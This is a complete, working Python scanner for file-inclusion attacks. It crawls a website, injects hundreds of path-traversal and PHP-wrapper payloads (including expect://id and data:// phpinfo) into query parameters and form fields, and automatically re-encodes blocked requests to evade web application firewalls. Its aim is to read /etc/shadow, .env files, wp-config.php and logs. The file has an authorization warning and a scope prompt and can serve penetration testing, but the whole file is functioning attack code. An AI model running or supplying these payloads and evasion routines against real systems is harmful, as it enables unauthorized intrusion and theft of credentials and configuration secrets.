#!/usr/bin/env python3
"""
LFI_tester.py - Local/Remote File Inclusion scanner with WAF-evasion.

Crawls a target (forms + links + query parameters), fuzzes every injection
point with a large payload set covering classic traversal, encoding
bypasses, PHP wrappers, log/env/config disclosure and null-byte tricks, and
automatically retries blocked requests with alternate encodings to defeat
naive filters and WAFs.

Zero third-party dependencies - Python 3.8+ standard library only
(urllib, html.parser, concurrent.futures, http.cookiejar, json).

Usage:
    python3 LFI_tester.py -u http://target.example/ [options]

For authorized security testing / CTF / your own lab only.
"""
from __future__ import annotations

import argparse
import concurrent.futures
import html
import http.cookiejar
import json
import os
import random
import re
import sys
import threading
import time
import urllib.error
import urllib.parse
import urllib.request
from dataclasses import dataclass
from html.parser import HTMLParser

# --------------------------------------------------------------------------
# Terminal colors - no colorama dependency, auto-disabled on non-tty/NO_COLOR
# --------------------------------------------------------------------------
class C:
    enabled = sys.stdout.isatty() and os.environ.get("NO_COLOR") is None
    RED = "\033[31m" if enabled else ""
    GREEN = "\033[32m" if enabled else ""
    YELLOW = "\033[33m" if enabled else ""
    CYAN = "\033[36m" if enabled else ""
    MAGENTA = "\033[35m" if enabled else ""
    BOLD = "\033[1m" if enabled else ""
    RESET = "\033[0m" if enabled else ""


def paint(text, color):
    return f"{color}{text}{C.RESET}"


PRINT_LOCK = threading.Lock()


def log(text):
    with PRINT_LOCK:
        print(text)

# --------------------------------------------------------------------------
# Payload set
#
# Rather than hand-listing hundreds of near-duplicate traversal strings, the
# bulk of the arsenal is generated by combining TRAVERSAL_PREFIXES (traversal
# depth + encoding/obfuscation style) with TARGET_FILES (what to read once
# the traversal lands). Every stack behaves differently - a filter that
# strips literal "../" once, a WAF that only decodes a payload one extra
# time, a legacy null-byte bug - so covering many encodings against the
# handful of near-universal targets (CORE_TARGETS, every prefix) plus many
# targets against a handful of reliable techniques (BROAD_TARGETS, a curated
# prefix subset) gives wide real-world coverage without a full, wasteful
# cartesian product across everything.
# --------------------------------------------------------------------------

TRAVERSAL_PREFIXES = [
    "../" * 6,
    "../" * 10,
    "../" * 14,
    "..\\" * 10,
    "....//" * 10,                    # non-recursive ".. " strip bypass
    "..../\\.." * 6 + "/",
    "%2e%2e%2f" * 10,                 # single URL-encode
    "%2e%2e/" * 10,
    "..%2f" * 10,
    "%2e%2e%5c" * 10,                 # single URL-encode, backslash
    "..%5c" * 10,
    "%252e%252e%252f" * 10,           # double URL-encode
    "..%252f" * 10,
    "%255c%255c" * 6,
    "%25252e%25252e%25252f" * 6,      # triple URL-encode
    "..%c0%af" * 10,                  # overlong UTF-8 slash (legacy IIS/Tomcat)
    "..%c1%9c" * 10,                  # overlong UTF-8 backslash
    "..%ef%bc%8f" * 10,               # fullwidth solidus
    "..;/" * 10,                      # Tomcat/Java path-parameter bypass
    "..\\/" * 10,                     # mixed separators
]

# A small set of near-universal targets, tested against EVERY prefix above -
# this is where encoding/obfuscation diversity actually earns its keep.
CORE_TARGETS = [
    "etc/passwd",
    "etc/shadow",
    "windows/win.ini",
    "proc/self/environ",
    "var/www/html/wp-config.php",
]

# A much broader target list, tested against a small curated set of reliable
# techniques (not every prefix, to keep the total request count sane).
BROAD_TRAVERSAL_TECHNIQUES = [
    "../" * 10,
    "....//" * 10,
    "%2e%2e%2f" * 10,
    "%252e%252e%252f" * 10,
    "..;/" * 10,
]

BROAD_TARGETS = [
    "etc/hosts", "etc/group", "etc/passwd%00",
    "etc/apache2/apache2.conf", "etc/httpd/conf/httpd.conf", "etc/nginx/nginx.conf",
    "etc/php.ini", "etc/php/7.4/apache2/php.ini", "etc/my.cnf", "etc/mysql/my.cnf",
    "proc/self/cmdline", "proc/self/status", "proc/version", "proc/net/tcp",
    "var/log/apache2/access.log", "var/log/apache2/error.log",
    "var/log/nginx/access.log", "var/log/nginx/error.log",
    "var/log/httpd/access_log", "var/log/httpd/error_log",
    "usr/local/apache/logs/access_log", "usr/local/apache2/logs/access_log",
    "var/log/auth.log", "var/log/secure", "var/log/mail.log", "var/log/vsftpd.log",
    "var/www/html/config.php", "var/www/html/configuration.php",
    "var/www/html/settings.php", "var/www/html/db.php", "var/www/html/connect.php",
    "var/lib/php/sessions/sess_a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6",
    "tmp/sess_a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6",
    ".env", ".env.local", ".env.production", ".git/config", ".git/HEAD",
    ".svn/entries", ".hg/hgrc", "WEB-INF/web.xml", "WEB-INF/classes/database.properties",
    "boot.ini", "Windows/System32/drivers/etc/hosts", "Windows/win.ini",
]

# Windows-flavoured backslash prefixes for the handful of payloads that make
# more sense with native Windows separators.
WINDOWS_PREFIXES = ["..\\" * 6, "..\\" * 10, "..%5c" * 10]
WINDOWS_TARGETS = ["windows\\win.ini", "boot.ini", "Windows\\System32\\drivers\\etc\\hosts"]

# Everything else that doesn't fit the prefix+target pattern: wrappers,
# absolute-path misconfig checks, and legacy null-byte truncation variants.
SPECIAL_PAYLOADS = [
    # --- PHP wrappers (source disclosure / RCE surface) ---
    "php://filter/convert.base64-encode/resource=index.php",
    "php://filter/convert.base64-encode/resource=config.php",
    "php://filter/convert.base64-encode/resource=config.php.bak",
    "php://filter/convert.base64-encode/resource=wp-config.php",
    "php://filter/convert.base64-encode/resource=database.php",
    "php://filter/convert.base64-encode/resource=../../../../etc/passwd",
    "php://filter/read=string.rot13/resource=index.php",
    "php://filter/read=convert.iconv.utf-8.utf-16/resource=index.php",
    "php://input",
    "php://memory",
    "php://temp",
    "expect://id",
    "expect://whoami",
    "data://text/plain;base64,SGVsbG8gV29ybGQh",
    "data://text/plain,<?php phpinfo();?>",
    "zip://payload.zip%23shell.php",
    "phar://payload.phar/shell.php",

    # --- Absolute-path direct checks (no traversal needed) ---
    "/etc/passwd", "/etc/shadow", "/.env", "/.git/config", "/.htaccess",
    "/.htpasswd", "/server-status", "/server-info", "/wp-config.php.bak",
    "/config.php.bak", "/config.php.swp", "/.DS_Store",

    # --- Null byte / truncation variants (legacy PHP < 5.3.4) ---
    "../../../../../../../../etc/passwd%00",
    "../../../../../../../../etc/passwd\x00",
    "/etc/passwd%00.jpg",
    "/etc/passwd%00.png",
    "../../../../../../../../etc/passwd%2500",
    "....//....//....//....//etc/passwd%00",
    "../" * 10 + "etc/passwd" + "." * 40,  # Windows MAX_PATH truncation
]


def _generate_traversal_payloads():
    seen = set()
    out = []
    for prefix in TRAVERSAL_PREFIXES:
        for target in CORE_TARGETS:
            p = prefix + target
            if p not in seen:
                seen.add(p)
                out.append(p)
    for prefix in BROAD_TRAVERSAL_TECHNIQUES:
        for target in BROAD_TARGETS:
            p = prefix + target
            if p not in seen:
                seen.add(p)
                out.append(p)
    for prefix in WINDOWS_PREFIXES:
        for target in WINDOWS_TARGETS:
            p = prefix + target
            if p not in seen:
                seen.add(p)
                out.append(p)
    return out


LFI_PAYLOADS = _generate_traversal_payloads() + SPECIAL_PAYLOADS

# Small, curated, high-signal subset for fast triage passes (--quick).
QUICK_LFI_PAYLOADS = [
    "../../../../../../../../etc/passwd",
    "....//....//....//....//....//....//....//....//etc/passwd",
    "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
    "%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd",
    "..;/..;/..;/..;/etc/passwd",
    "..\\..\\..\\..\\windows\\win.ini",
    "../../../../../../../../etc/passwd%00",
    "php://filter/convert.base64-encode/resource=index.php",
    "php://filter/convert.base64-encode/resource=config.php",
    "expect://id",
    "../../../../../../../../var/log/apache2/access.log",
    "../../../../../../../../.env",
    ".env",
    "wp-config.php",
    "../../../../../../../../.git/config",
    "/.htaccess",
    "/server-status",
    "../../../../../../../../proc/self/environ",
    "/etc/passwd",
    "../../../../../../../../etc/apache2/apache2.conf",
]

# Parameter names commonly vulnerable to LFI, probed when a page exposes no
# query string of its own.
COMMON_LFI_PARAMS = [
    "page", "file", "path", "template", "doc", "document", "folder",
    "root", "pg", "style", "pdf", "view", "include", "inc", "locale", "lang",
    "content", "site", "action", "board", "date", "detail", "url", "show",
]

# Generic WAF / IPS response signatures (status-code checks are separate).
WAF_SIGNATURES = [
    "blocked by", "web application firewall", "mod_security", "modsecurity",
    "access denied", "request rejected", "cloudflare", "incapsula", "sucuri",
    "distil", "you have been blocked", "security violation", "not acceptable",
    "forbidden",
]

MAX_BODY_BYTES = 2 * 1024 * 1024  # cap downloads to 2MB per response

# --------------------------------------------------------------------------
# Detection markers per payload family
# --------------------------------------------------------------------------

def is_lfi_successful(payload, response_text):
    lower = response_text.lower()
    if "root:x:" in response_text and ("passwd" in payload or payload == "/etc/passwd"):
        return True
    if "apache/2." in lower and "apache2.conf" in payload:
        return True
    if "nginx/1." in lower and "nginx.conf" in payload:
        return True
    if "[boot loader]" in lower and ("win.ini" in payload or "boot.ini" in payload):
        return True
    if ("db_username" in lower or "db_password" in lower) and (
        ".env" in payload or "config.php" in payload or "wp-config" in payload
    ):
        return True
    if "php://filter" in payload:
        stripped = response_text.strip()
        if len(stripped) > 8 and re.fullmatch(r"[A-Za-z0-9+/=\s]+", stripped):
            return True
    if "\"remote\"" in lower or "url = https://" in lower:
        if ".git/config" in payload:
            return True
    if "get /" in lower and "access.log" in payload:
        return True
    if "user_id" in lower and "sess" in payload:
        return True
    if "root:" in response_text and "environ" in payload:
        return True
    return False


def is_waf_blocked(status, response_text):
    if status in (403, 406, 429, 501):
        return True
    lower = response_text.lower()
    return any(sig in lower for sig in WAF_SIGNATURES)

# --------------------------------------------------------------------------
# WAF bypass transforms - applied to a blocked payload, strongest first
# --------------------------------------------------------------------------

def _pre_url_encode(s):
    # Every send_fn in this script transmits values through
    # urllib.parse.urlencode(), which already applies one layer of percent
    # encoding on the wire. Pre-encoding here ONCE more is what actually
    # produces double-encoding at the wire - encoding twice here would
    # overshoot to triple-encoding and miss a WAF that only decodes once
    # extra internally.
    return urllib.parse.quote(s, safe="")


def _dot_semicolon(s):
    return s.replace("../", "..;/").replace("..\\", "..;\\")


def _mixed_case(s):
    return "".join(ch.upper() if i % 2 else ch for i, ch in enumerate(s))


def _append_null(s):
    return s if s.endswith("%00") else s + "%00"


BYPASS_TRANSFORMS = [
    ("url-encode", _pre_url_encode),
    ("dot-semicolon", _dot_semicolon),
    ("mixed-case", _mixed_case),
    ("null-byte-suffix", _append_null),
]

# --------------------------------------------------------------------------
# HTTP client (urllib-based, cookie jar, proxy, retries)
# --------------------------------------------------------------------------

@dataclass
class Response:
    status: int
    headers: dict
    text: str
    elapsed: float
    error: str = ""


class HttpClient:
    def __init__(self, timeout=10, user_agent=None, extra_headers=None,
                 proxy=None, cookie_header=None, retries=2):
        self.timeout = timeout
        self.retries = retries
        self.cookiejar = http.cookiejar.CookieJar()
        handlers = [urllib.request.HTTPCookieProcessor(self.cookiejar)]
        if proxy:
            handlers.append(urllib.request.ProxyHandler({"http": proxy, "https": proxy}))
        self.opener = urllib.request.build_opener(*handlers)
        self.base_headers = {
            "User-Agent": user_agent or (
                "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                "(KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
            ),
        }
        if extra_headers:
            self.base_headers.update(extra_headers)
        if cookie_header:
            self.base_headers["Cookie"] = cookie_header

    def request(self, url, method="GET", data=None, headers=None):
        hdrs = dict(self.base_headers)
        if headers:
            hdrs.update(headers)
        body = None
        if data is not None:
            body = urllib.parse.urlencode(data, doseq=True).encode()
            hdrs.setdefault("Content-Type", "application/x-www-form-urlencoded")
        last_err = ""
        for attempt in range(self.retries + 1):
            start = time.monotonic()
            try:
                req = urllib.request.Request(url, data=body, headers=hdrs, method=method)
                with self.opener.open(req, timeout=self.timeout) as resp:
                    elapsed = time.monotonic() - start
                    raw = resp.read(MAX_BODY_BYTES)
                    charset = resp.headers.get_content_charset() or "utf-8"
                    text = raw.decode(charset, errors="replace")
                    return Response(resp.status, dict(resp.headers), text, elapsed)
            except urllib.error.HTTPError as e:
                elapsed = time.monotonic() - start
                raw = e.read(MAX_BODY_BYTES) if e.fp else b""
                text = raw.decode("utf-8", errors="replace")
                return Response(e.code, dict(e.headers or {}), text, elapsed)
            except (urllib.error.URLError, TimeoutError, ConnectionError, OSError) as e:
                last_err = str(e)
                elapsed = time.monotonic() - start
                # Connection-refused (and similar) is a deterministic failure:
                # retrying with backoff just multiplies wasted time across
                # hundreds of payloads against a dead target. Only genuinely
                # transient errors (timeouts, resets) are worth a retry.
                reason = getattr(e, "reason", e)
                non_retryable = isinstance(reason, ConnectionRefusedError) or \
                    "connection refused" in str(reason).lower()
                if not non_retryable and attempt < self.retries:
                    time.sleep(0.4 * (attempt + 1))
                    continue
                return Response(0, {}, "", elapsed, error=last_err)
        return Response(0, {}, "", 0.0, error=last_err)

# --------------------------------------------------------------------------
# HTML parsing (replaces BeautifulSoup): forms + links
# --------------------------------------------------------------------------

class FormParser(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {
                "action": attrs.get("action", "") or "",
                "method": (attrs.get("method") or "get").lower(),
                "inputs": [],
            }
        elif tag in ("input", "textarea", "select") and self._current is not None:
            name = attrs.get("name")
            if name:
                self._current["inputs"].append({
                    "name": name,
                    "type": attrs.get("type", "text"),
                    "value": attrs.get("value", ""),
                })

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None


class LinkParser(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.links = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a" and attrs.get("href"):
            self.links.append(attrs["href"])


def extract_forms(html_text):
    p = FormParser()
    try:
        p.feed(html_text)
    except Exception:
        pass
    return p.forms


def extract_links(html_text):
    p = LinkParser()
    try:
        p.feed(html_text)
    except Exception:
        pass
    return p.links

# --------------------------------------------------------------------------
# Crawler - same-host, bounded depth/pages
# --------------------------------------------------------------------------

def build_action_url(base_url, action):
    if not action:
        return base_url
    return urllib.parse.urljoin(base_url, action)


def same_host(url_a, url_b):
    return urllib.parse.urlsplit(url_a).netloc == urllib.parse.urlsplit(url_b).netloc


def crawl(client, start_url, max_pages=20):
    """Returns (list of (page_url, html_text), list of forms as (page_url, form))."""
    seen = set()
    queue = [start_url]
    pages = []
    forms_out = []
    while queue and len(seen) < max_pages:
        url = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        resp = client.request(url)
        if resp.error or resp.status == 0:
            continue
        pages.append((url, resp.text))
        for form in extract_forms(resp.text):
            forms_out.append((url, form))
        for href in extract_links(resp.text):
            nxt = urllib.parse.urljoin(url, href)
            nxt = nxt.split("#", 1)[0]
            if nxt not in seen and same_host(nxt, start_url) and nxt.startswith(("http://", "https://")):
                queue.append(nxt)
    return pages, forms_out

# --------------------------------------------------------------------------
# Scan result bookkeeping
# --------------------------------------------------------------------------

@dataclass
class Finding:
    location: str
    param: str
    payload: str
    vulnerable: bool
    waf_blocked: bool
    bypassed_with: str = ""
    status: int = 0
    snippet: str = ""


RESULTS_LOCK = threading.Lock()


class Scanner:
    def __init__(self, client, args):
        self.client = client
        self.args = args
        self.findings = []
        self.tested = 0
        self.payloads = QUICK_LFI_PAYLOADS if getattr(args, "quick", False) else LFI_PAYLOADS

    def record(self, finding):
        with RESULTS_LOCK:
            self.findings.append(finding)
            self.tested += 1
        if finding.vulnerable:
            tag = paint("BYPASS+VULN", C.MAGENTA) if finding.bypassed_with else paint("VULNERABLE", C.RED)
            log(f"[!] {tag} {finding.location} param={finding.param} payload={finding.payload!r}"
                + (f" (bypassed via {finding.bypassed_with})" if finding.bypassed_with else ""))
        elif finding.waf_blocked and self.args.verbose:
            log(paint(f"[waf] blocked: {finding.location} param={finding.param} payload={finding.payload!r}", C.YELLOW))
        elif self.args.verbose:
            log(paint(f"[-] no LFI: {finding.location} param={finding.param} payload={finding.payload!r}", C.GREEN))

    def try_payload(self, send_fn, location, param, payload):
        """send_fn(payload) -> Response. Handles WAF-blocked auto-bypass retry."""
        resp = send_fn(payload)
        if resp.error:
            return
        blocked = is_waf_blocked(resp.status, resp.text)
        vulnerable = (not blocked) and is_lfi_successful(payload, resp.text)
        bypassed_with = ""
        if blocked and self.args.bypass:
            for name, transform in BYPASS_TRANSFORMS:
                variant = transform(payload)
                if variant == payload:
                    continue
                r2 = send_fn(variant)
                if r2.error:
                    continue
                if not is_waf_blocked(r2.status, r2.text) and is_lfi_successful(variant, r2.text):
                    resp, vulnerable, bypassed_with = r2, True, name
                    blocked = False
                    break
        self.record(Finding(
            location=location, param=param, payload=payload,
            vulnerable=vulnerable, waf_blocked=blocked, bypassed_with=bypassed_with,
            status=resp.status, snippet=resp.text[:200] if vulnerable else "",
        ))
        if self.args.delay:
            time.sleep(random.uniform(0, self.args.delay))

    # -- injection points --------------------------------------------
    def scan_query_params(self, url):
        parsed = urllib.parse.urlsplit(url)
        params = urllib.parse.parse_qs(parsed.query, keep_blank_values=True)
        target_params = list(params.keys()) if params else (
            COMMON_LFI_PARAMS if self.args.guess_params else []
        )
        if not target_params:
            return
        for param in target_params:
            base_params = {k: v[0] for k, v in params.items()}

            def send(payload, base_params=base_params, param=param, parsed=parsed):
                p = dict(base_params)
                p[param] = payload
                q = urllib.parse.urlencode(p)
                test_url = urllib.parse.urlunsplit((parsed.scheme, parsed.netloc, parsed.path, q, ""))
                return self.client.request(test_url)

            location = urllib.parse.urlunsplit((parsed.scheme, parsed.netloc, parsed.path, "", ""))
            for payload in self.payloads:
                self.try_payload(send, location, param, payload)

    def scan_form(self, page_url, form):
        target_url = build_action_url(page_url, form["action"])
        inputs = form["inputs"]
        if not inputs:
            return
        defaults = {i["name"]: i.get("value", "") or "test" for i in inputs}
        method = form["method"]
        for target_input in inputs:
            param = target_input["name"]

            def send(payload, param=param, target_url=target_url, method=method):
                data = dict(defaults)
                data[param] = payload
                if method == "post":
                    return self.client.request(target_url, method="POST", data=data)
                q = urllib.parse.urlencode(data)
                sep = "&" if "?" in target_url else "?"
                return self.client.request(f"{target_url}{sep}{q}")

            for payload in self.payloads:
                self.try_payload(send, target_url, param, payload)


# --------------------------------------------------------------------------
# Reporting
# --------------------------------------------------------------------------

def write_json_report(findings, path):
    data = [f.__dict__ for f in findings]
    with open(path, "w") as fh:
        json.dump(data, fh, indent=2)


def write_html_report(findings, path, target):
    rows = []
    for f in findings:
        if not (f.vulnerable or f.waf_blocked):
            continue
        badge = "VULNERABLE" if f.vulnerable else "WAF-BLOCKED"
        color = "#c0392b" if f.vulnerable else "#d68910"
        rows.append(
            f"<tr><td>{html.escape(f.location)}</td><td>{html.escape(f.param)}</td>"
            f"<td><code>{html.escape(f.payload)}</code></td>"
            f"<td style='color:{color};font-weight:bold'>{badge}"
            f"{' (' + html.escape(f.bypassed_with) + ')' if f.bypassed_with else ''}</td></tr>"
        )
    vuln_count = sum(1 for f in findings if f.vulnerable)
    blocked_count = sum(1 for f in findings if f.waf_blocked and not f.vulnerable)
    body = f"""<!doctype html><html><head><meta charset="utf-8">
<title>LFI_tester report</title>
<style>
body{{font-family:system-ui,sans-serif;margin:2rem;background:#0f1117;color:#e6e6e6}}
table{{border-collapse:collapse;width:100%}}
td,th{{border:1px solid #333;padding:6px 10px;text-align:left;font-size:14px}}
th{{background:#1b1e27}}
code{{background:#1b1e27;padding:2px 4px;border-radius:3px}}
</style></head><body>
<h1>LFI_tester report</h1>
<p>Target: <code>{html.escape(target)}</code></p>
<p>Tested payloads: {len(findings)} | Vulnerable: {vuln_count} | WAF-blocked: {blocked_count}</p>
<table><tr><th>Location</th><th>Param</th><th>Payload</th><th>Result</th></tr>
{''.join(rows) if rows else '<tr><td colspan=4>No vulnerabilities or WAF blocks recorded.</td></tr>'}
</table>
</body></html>"""
    with open(path, "w") as fh:
        fh.write(body)

# --------------------------------------------------------------------------
# CLI
# --------------------------------------------------------------------------

def parse_headers(pairs):
    out = {}
    for pair in pairs or []:
        if ":" not in pair:
            continue
        k, v = pair.split(":", 1)
        out[k.strip()] = v.strip()
    return out


def build_arg_parser():
    ap = argparse.ArgumentParser(
        description="LFI/RFI scanner with WAF-evasion (stdlib only). Authorized testing only.",
    )
    ap.add_argument("-u", "--url", required=True, help="Target URL, e.g. http://target/")
    ap.add_argument("-t", "--timeout", type=float, default=10, help="Per-request timeout in seconds")
    ap.add_argument("-w", "--workers", type=int, default=8, help="Concurrent worker threads")
    ap.add_argument("--delay", type=float, default=0, help="Random jitter (0..delay s) between requests")
    ap.add_argument("--max-pages", type=int, default=20, help="Max pages to crawl for forms/links")
    ap.add_argument("--no-crawl", action="store_true", help="Only test the given URL, skip link crawling")
    ap.add_argument("--no-forms", action="store_true", help="Skip form discovery/testing")
    ap.add_argument("-q", "--quick", action="store_true",
                     help=f"Use a small curated payload subset ({len(QUICK_LFI_PAYLOADS)} payloads) "
                          f"for fast triage instead of the full arsenal ({len(LFI_PAYLOADS)} payloads, default)")
    ap.add_argument("--guess-params", action="store_true", default=True,
                     help="Probe common LFI parameter names on paramless URLs (default: on)")
    ap.add_argument("--no-guess-params", dest="guess_params", action="store_false")
    ap.add_argument("--bypass", action="store_true", default=True,
                     help="Auto-retry WAF-blocked payloads with alternate encodings (default: on)")
    ap.add_argument("--no-bypass", dest="bypass", action="store_false")
    ap.add_argument("--cookie", help="Raw Cookie header, e.g. 'PHPSESSID=abc; role=admin'")
    ap.add_argument("-H", "--header", action="append", help="Extra header 'Name: value' (repeatable)")
    ap.add_argument("--user-agent", help="Override User-Agent")
    ap.add_argument("--proxy", help="HTTP(S) proxy, e.g. http://127.0.0.1:8080 (Burp/ZAP)")
    ap.add_argument("-o", "--output", help="Write JSON findings report to this path")
    ap.add_argument("--html-report", help="Write an HTML findings report to this path")
    ap.add_argument("-y", "--yes", action="store_true", help="Skip the confirmation prompt")
    ap.add_argument("-v", "--verbose", action="store_true", help="Print every test, not just hits")
    return ap


def confirm_scope(url, assume_yes):
    host = urllib.parse.urlsplit(url).hostname or ""
    if assume_yes or host in ("127.0.0.1", "localhost", "::1"):
        return True
    log(paint("[!] You are about to send attack payloads to a non-local target.", C.YELLOW))
    log(f"    Target: {url}")
    log("    Only proceed if you own this system or have explicit written authorization.")
    try:
        answer = input("    Type 'yes' to continue: ").strip().lower()
    except (EOFError, KeyboardInterrupt):
        return False
    return answer == "yes"


def main():
    args = build_arg_parser().parse_args()

    if not confirm_scope(args.url, args.yes):
        log(paint("[!] Aborted - scope not confirmed.", C.RED))
        sys.exit(1)

    client = HttpClient(
        timeout=args.timeout,
        user_agent=args.user_agent,
        extra_headers=parse_headers(args.header),
        proxy=args.proxy,
        cookie_header=args.cookie,
    )
    scanner = Scanner(client, args)

    log(paint(f"[*] Starting LFI scan on: {args.url} ({len(scanner.payloads)} payloads/injection point)", C.CYAN))

    probe = client.request(args.url)
    if probe.error:
        log(paint(f"[!] Could not reach {args.url}: {probe.error}", C.RED))
        sys.exit(1)

    if args.no_crawl:
        pages = [(args.url, probe.text)]
        forms = [(args.url, f) for f in extract_forms(pages[0][1])] if not args.no_forms else []
    else:
        pages, forms = crawl(client, args.url, max_pages=args.max_pages)
        if args.no_forms:
            forms = []
    log(paint(f"[+] Crawled {len(pages)} page(s), found {len(forms)} form(s).", C.CYAN))

    jobs = []
    urls_to_probe = {args.url} | {p for p, _ in pages}
    with concurrent.futures.ThreadPoolExecutor(max_workers=args.workers) as pool:
        for u in urls_to_probe:
            jobs.append(pool.submit(scanner.scan_query_params, u))
        for page_url, form in forms:
            jobs.append(pool.submit(scanner.scan_form, page_url, form))
        try:
            for j in concurrent.futures.as_completed(jobs):
                j.result()
        except KeyboardInterrupt:
            log(paint("\n[!] Interrupted - showing partial results.", C.YELLOW))

    vuln = [f for f in scanner.findings if f.vulnerable]
    blocked = [f for f in scanner.findings if f.waf_blocked and not f.vulnerable]
    log(paint(f"\n[*] LFI scan completed. Tested {scanner.tested} requests.", C.CYAN))
    log(paint(f"    Vulnerable findings: {len(vuln)}", C.RED if vuln else C.GREEN))
    log(paint(f"    WAF-blocked (not bypassed): {len(blocked)}", C.YELLOW))

    if args.output:
        write_json_report(scanner.findings, args.output)
        log(f"[*] JSON report written to {args.output}")
    if args.html_report:
        write_html_report(scanner.findings, args.html_report, args.url)
        log(f"[*] HTML report written to {args.html_report}")


if __name__ == "__main__":
    main()
